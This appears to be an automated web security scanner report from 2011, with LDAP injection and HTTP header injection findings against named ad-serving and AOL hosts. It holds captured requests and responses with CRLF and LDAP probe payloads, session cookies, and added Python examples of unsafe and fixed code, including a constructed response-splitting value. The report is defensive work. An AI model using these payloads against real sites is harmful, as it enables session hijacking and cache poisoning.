The payloads 1fe895629ae7659c)(sn=* and 1fe895629ae7659c)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner. Note, however, that the two captured responses below are identical apart from the Set-Cookie header, which simply echoes the pid value with the parentheses HTML-entity-encoded, and both bodies are /*error*/; the difference the scanner observed is therefore consistent with plain reflection rather than with the payload reaching a directory query. Treat this finding as unconfirmed until it has been tested manually.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.
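The two defences above, an allowlist followed by RFC 4515 escaping, together with a small filter parser that shows why the scanner's two probes behave differently when a filter is built by string concatenation. This is an added example for this report, not code from ar.voicefive.com or from the scanner. The filter template and attribute names are assumptions (the report shows only that pid reaches a disjunctive filter); the two probe values are the ones from the report, URL-decoded, and the pid format in the allowlist is inferred from the 16-hex-character value seen in the requests.

```python
import re

# RFC 4515 section 3: characters that must be escaped inside an assertion value.
_LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}

# Hypothetical shape of the broker's lookup; attribute names are assumed.
FILTER_TEMPLATE = "(|(pid={pid})(objectClass=partnerPixel))"

# The two probes from the report, URL-decoded.
PROBE_VALID = "1fe895629ae7659c)(sn=*"
PROBE_BROKEN = "1fe895629ae7659c)!(sn=*"


def escape_filter_value(value):
    """Escape a value for use inside an LDAP search filter."""
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(pid):
    """String concatenation: the pattern the scanner is probing for."""
    return FILTER_TEMPLATE.format(pid=pid)


def build_filter_safe(pid):
    """Allowlist first (16 lowercase hex characters, an assumed format), escape
    second, so that a later relaxation of the allowlist does not reopen the hole."""
    if not re.fullmatch(r"[0-9a-f]{16}", pid):
        raise ValueError(f"pid rejected by allowlist: {pid!r}")
    return FILTER_TEMPLATE.format(pid=escape_filter_value(pid))


def count_filter_items(s):
    """Minimal RFC 4515 well-formedness check. Returns the number of attr=value
    items in the filter, or raises ValueError on a syntax error, which is what a
    directory server does with the second probe."""

    def parse(i):
        if i >= len(s) or s[i] != "(":
            raise ValueError(f"expected '(' at offset {i}")
        i += 1
        if i >= len(s):
            raise ValueError("unexpected end of filter")
        if s[i] in "&|":
            i += 1
            n = 0
            while i < len(s) and s[i] == "(":
                i, sub = parse(i)
                n += sub
        elif s[i] == "!":
            i, n = parse(i + 1)
        else:
            # An escaped ')' is '\29', so a literal ')' always ends the item.
            j = s.find(")", i)
            if j == -1:
                raise ValueError("unterminated item")
            attr, sep, _ = s[i:j].partition("=")
            if not sep or not attr:
                raise ValueError(f"malformed item {s[i:j]!r}")
            i, n = j, 1
        if i >= len(s) or s[i] != ")":
            raise ValueError(f"expected ')' at offset {i}")
        return i + 1, n

    end, n = parse(0)
    if end != len(s):
        raise ValueError("trailing data after filter")
    return n


def is_well_formed(s):
    try:
        count_filter_items(s)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Probe 1 stays syntactically valid but gains an (sn=*) branch: logic altered.
    print(build_filter_unsafe(PROBE_VALID), count_filter_items(build_filter_unsafe(PROBE_VALID)))
    # Probe 2 is a syntax error: the server answers differently, which is the scanner's signal.
    print(build_filter_unsafe(PROBE_BROKEN), is_well_formed(build_filter_unsafe(PROBE_BROKEN)))
    # Escaping alone keeps the item count at 2; the allowlist rejects the probe outright.
    print(FILTER_TEMPLATE.format(pid=escape_filter_value(PROBE_VALID)))
```

The parser is deliberately small (equality items only, no extensible or substring matching rules); it is there to make the "valid but altered" versus "invalid" distinction visible, not to validate production filters.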

Request 1

GET /bmx3/broker.pli?pid=1fe895629ae7659c)(sn=*&PRAd=310177527&AR_C=211671722 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/310177527/direct;wi.300;hi.250/01/557100524?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1539894;BnId=1;itime=557100524;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:51182:56419:56148:57362:56835:51186:56673:56780:50220:56969:56299:54057:56987:50229:54063:57144:60183:60130;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:58 2011&prad=253735228&arc=178115060&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304557020%2E283%2Cwait%2D%3E10000%2C

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 01:16:21 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_1fe895629ae7659c&#41;&#40;sn=exp=1&initExp=Thu May 5 01:16:21 2011&recExp=Thu May 5 01:16:21 2011&prad=310177527&arc=211671722&; expires=Wed 03-Aug-2011 01:16:21 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

Request 2

GET /bmx3/broker.pli?pid=1fe895629ae7659c)!(sn=*&PRAd=310177527&AR_C=211671722 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/310177527/direct;wi.300;hi.250/01/557100524?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1539894;BnId=1;itime=557100524;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:51182:56419:56148:57362:56835:51186:56673:56780:50220:56969:56299:54057:56987:50229:54063:57144:60183:60130;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:58 2011&prad=253735228&arc=178115060&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304557020%2E283%2Cwait%2D%3E10000%2C

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 01:16:21 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_1fe895629ae7659c&#41;!&#40;sn=exp=1&initExp=Thu May 5 01:16:21 2011&recExp=Thu May 5 01:16:21 2011&prad=310177527&arc=211671722&; expires=Wed 03-Aug-2011 01:16:21 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

4. HTTP header injection
There are 79 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
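Both halves of the issue above, the Location header being built by concatenation (as in 4.3 and 4.4) and the resulting split response as a client parses it, plus the two-layer fix: percent-encode values when rebuilding the URL and refuse control characters at the point a header is emitted. This is an added example for this report, not code from api.screenname.aol.com or from the scanner. The attacker value is constructed for illustration: the report's probe injected a single CRLF, whereas this one also injects a header and a blank line so the full response-splitting effect is visible.

```python
import re
from urllib.parse import urlencode

# Anything below 0x20, plus DEL, is not a legal header-value octet.
_CTL = re.compile(r"[\x00-\x1f\x7f]")

LOGIN_URL = "https://api.screenname.aol.com/auth/login"

# Constructed attacker value for the f parameter (not the report's probe).
ATTACK_F = "b288d\r\nSet-Cookie: injected=1\r\n\r\n<html>attacker body</html>"


def build_location_unsafe(dev_id, f):
    """The pattern findings 4.3 and 4.4 imply: decoded query values are
    concatenated straight back into the Location header."""
    return f"{LOGIN_URL}?devId={dev_id}&f={f}"


def is_safe_header_value(value):
    return _CTL.search(value) is None


def header_value(value):
    """Last line of defence, applied wherever a header is emitted."""
    if not is_safe_header_value(value):
        raise ValueError("control character in header value")
    return value


def build_location_safe(dev_id, f):
    """Re-encode values when rebuilding the URL (urlencode turns CR LF into
    %0D%0A), then still run the result through the control-character check."""
    return header_value(LOGIN_URL + "?" + urlencode({"devId": dev_id, "f": f}))


def serialize_response(status_line, headers):
    """Emit a response the way a naive server does: no per-header validation."""
    lines = [status_line] + [f"{name}: {value}" for name, value in headers]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


def parse_response(raw):
    """What a client or cache does with the bytes: the header block ends at the
    first empty line and every line before it is a header. Lines without a
    colon come back with name None; scanning proxy logs for those is a cheap
    way to spot a successful injection."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        headers.append((name.strip(), value.strip()) if sep else (None, line))
    return lines[0], headers, body


def redirect_response(location):
    """A 302 with the headers seen in the report's captured response."""
    return serialize_response(
        "HTTP/1.1 302 Moved Temporarily",
        [("Location", location),
         ("Content-Type", "text/html;charset=UTF-8"),
         ("Content-Length", "0")],
    )


if __name__ == "__main__":
    raw = redirect_response(build_location_unsafe("ru1m1hWVLRPqEkwX", ATTACK_F))
    status, hdrs, body = parse_response(raw)
    print(hdrs)        # the injected Set-Cookie is now a real header
    print(body[:40])   # the attacker's HTML, followed by the server's own Content-Type line
    print(build_location_safe("ru1m1hWVLRPqEkwX", ATTACK_F))
```

The encoding step is what fixes the bug; the control-character check exists so that a second code path that forgets to encode fails closed instead of emitting a split response.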


4.1. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload dbbe6%0d%0aaea1137f35f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gifdbbe6%0d%0aaea1137f35f?557101547 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gifdbbe6
aea1137f35f
:
Date: Thu, 05 May 2011 00:59:35 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.2. http://ad.doubleclick.net/getcamphist [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload 26ba9%0d%0a8501ac1155d was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /getcamphist;src=1513429;host=metrics.apple.com%2Fb%2Fss%2Fappleglobal%2Cappleitunes%2Cappleusitunesipod%2F1%2FH.22.1%2Fs73546360775362%3FAQB%3D1%26vvpr%3Dtrue%26%26ndh%3D1%26t%3D5%252F4%252F2011%252012%253A45%253A22%25204%2520300%26pageName%3Ditunes%2520-%2520affiliates%2520-%2520download%2520itunes%2520%28us%29%26g%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252Faffiliates%252Fdownload%252F%26r%3Dhttp%253A%252F%252Fitunes.apple.com%252FWebObjects%252FMZStore.woa%252Fwa%252FviewEula%253Fid%253D347839246%26cc%3DUSD%26vvp%3DDFA%25231513429%253Av46%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dwww.us.itunes%26c4%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252Faffiliates%252Fdownload%252F%26c5%3Dwin32%26c6%3D%253A%2520itunes%2520-%2520affiliates%2520-%2520download%2520itunes%2520%28us%29%26v6%3Dwww-itsthanku-071220v%26c9%3Dwindows%26v9%3Dwww-itsthanku-071220p%26c15%3Dno%2520zip%26c18%3Dno%2520quicktime%26c19%3Dflash%252010%26c20%3Dnon-store%2520kiosk%26c44%3Dappleglobal%252Cappleitunes%252Cappleusitunesipod%26c48%3D1%26c49%3DD%253Ds_vi%26c50%3Ditunes%253D2%26s%3D1920x1200%26c%3D16%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1022%26bh%3D1007%26p%3DShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.240.7%253BJava%28TM%29%2520Platform%2520SE%25206%2520U24%253BSilverlight%2520Plug-In%253BChrome%2520PDF%2520Viewer%253BGoogle%2520Gears%25200.5.33.0%253BWPI%2520Detector%25201.3%253BGoogle%2520Update%253BDefault%2520Plug-in%253B%26AQE%3D126ba9%0d%0a8501ac1155d&A2S=1;ord=1217103637 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/affiliates/download/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://metrics.apple.com/b/ss/appleglobal,appleitunes,appleusitunesipod/1/H.22.1/s73546360775362?AQB=1&vvpr=true&&ndh=1&t=5%2F4%2F2011%2012%3A45%3A22%204%20300&pageName=itunes%20-%20affiliates%20-%20download%20itunes%20(us)&g=http%3A%2F%2Fwww.apple.com%2Fitunes%2Faffiliates%2Fdownload%2F&r=http%3A%2F%2Fitunes.apple.com%2FWebObjects%2FMZStore.woa%2Fwa%2FviewEula%3Fid%3D347839246&cc=USD&vvp=DFA%231513429%3Av46%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=www.us.itunes&c4=http%3A%2F%2Fwww.apple.com%2Fitunes%2Faffiliates%2Fdownload%2F&c5=win32&c6=%3A%20itunes%20-%20affiliates%20-%20download%20itunes%20(us)&v6=www-itsthanku-071220v&c9=windows&v9=www-itsthanku-071220p&c15=no%20zip&c18=no%20quicktime&c19=flash%2010&c20=non-store%20kiosk&c44=appleglobal%2Cappleitunes%2Cappleusitunesipod&c48=1&c49=D%3Ds_vi&c50=itunes%3D2&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1022&bh=1007&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=126ba9
8501ac1155d
&A2S=1/respcamphist;src=1513429;rch=2;lastimp=240264641;lastimptime=1304557682;lis=522165;lip=63097682;lic=28638481;lir=28656360;lirv=2;likv=0;lipn=B5465585.3;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1304599550:
Date: Thu, 05 May 2011 12:45:49 GMT
Server: GFE/2.0
Content-Type: text/html


4.3. http://api.screenname.aol.com/auth/login [devId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.screenname.aol.com
Path:   /auth/login

Issue detail

The value of the devId request parameter is copied into the Location response header. The payload d807c%0d%0af48a51c2172 was submitted in the devId parameter. This caused a response containing an injected HTTP header.

Request

GET /auth/login?devId=d807c%0d%0af48a51c2172&f=qs&succUrl= HTTP/1.1
Host: api.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; JSESSIONID=BBF9B7FB9E26D8ED033DC7F99C6FF372; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; OASC=diAxLjAgayAwIEtka21Cc09VUUtRRGRQRCtGZ1lUMG9KeWU5OD0%3D-SSQdmqasJXW7AratTMW0EQEWTMe1VUR5nhDclcT%2FxS5anlWsRZrQQVYOAITNhFUURd6bocJQ7JlhxqVytjSx4wPs6vBqi04y; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 05 May 2011 13:01:45 GMT
Set-Cookie: JSESSIONID=357BE1B712C7CBD42E688AD1F49F1367; Path=/auth
Location: https://api.screenname.aol.com/auth/login?devId=d807c
f48a51c2172
&f=qs
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Keep-Alive: timeout=15, max=454
Connection: Keep-Alive


4.4. http://api.screenname.aol.com/auth/login [f parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.screenname.aol.com
Path:   /auth/login

Issue detail

The value of the f request parameter is copied into the Location response header. The payload b288d%0d%0a423203780bc was submitted in the f parameter. This caused a response containing an injected HTTP header. In the captured response below the injected line is followed by an empty line; if that reflects the raw bytes on the wire, a client would treat everything from Content-Type onwards as the response body, which is a full response-splitting condition rather than a single extra header.

Request

GET /auth/login?devId=ru1m1hWVLRPqEkwX&f=b288d%0d%0a423203780bc&succUrl= HTTP/1.1
Host: api.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; JSESSIONID=BBF9B7FB9E26D8ED033DC7F99C6FF372; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; OASC=diAxLjAgayAwIEtka21Cc09VUUtRRGRQRCtGZ1lUMG9KeWU5OD0%3D-SSQdmqasJXW7AratTMW0EQEWTMe1VUR5nhDclcT%2FxS5anlWsRZrQQVYOAITNhFUURd6bocJQ7JlhxqVytjSx4wPs6vBqi04y; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 05 May 2011 13:01:46 GMT
Set-Cookie: JSESSIONID=B4961C5905C7619F69B7FF973CC99CCB; Path=/auth
Location: https://api.screenname.aol.com/auth/login?devId=ru1m1hWVLRPqEkwX&f=b288d
423203780bc

Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Keep-Alive: timeout=15, max=478
Connection: Keep-Alive


4.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload 7311c%0d%0a5371b4a8ad4 was submitted in the flv parameter. This caused a response containing an injected HTTP header. Because the reflection point is inside Set-Cookie, an attacker can also terminate the eyeblaster cookie early and set additional cookies or cookie attributes for bs.serving-sys.com, in addition to injecting arbitrary headers.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5130026~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~261~0~01020^ebAboveTheFoldDuration~261~0~01020&OptOut=0&ebRandom=0.19715182739309967&flv=7311c%0d%0a5371b4a8ad4&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/aim/
Origin: http://mobile.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=92e362f3-0c29-4bfc-89bf-3b975bf183723HX0c0; expires=Wed, 03-Aug-2011 08:43:33 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=7311c
5371b4a8ad4
&RES=128&WMPV=0; expires=Wed, 03-Aug-2011 08: 43:33 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 05 May 2011 12:43:33 GMT
Connection: close
Content-Length: 0


4.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 83642%0d%0aa73a02d7dd9 was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5130026~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~261~0~01020^ebAboveTheFoldDuration~261~0~01020&OptOut=0&ebRandom=0.19715182739309967&flv=10.2154&wmpv=0&res=83642%0d%0aa73a02d7dd9 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/aim/
Origin: http://mobile.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=76238e15-8c4d-4f61-824e-4e05fec4c7d73HX040; expires=Wed, 03-Aug-2011 08:43:34 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=10.2154&RES=83642
a73a02d7dd9
&WMPV=0; expires=Wed, 03-Aug-2011 08: 43:34 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 05 May 2011 12:43:33 GMT
Connection: close
Content-Length: 0


4.7. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload aea5e%0d%0addd8221295a was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5130026~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~261~0~01020^ebAboveTheFoldDuration~261~0~01020&OptOut=0&ebRandom=0.19715182739309967&flv=10.2154&wmpv=aea5e%0d%0addd8221295a&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/aim/
Origin: http://mobile.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
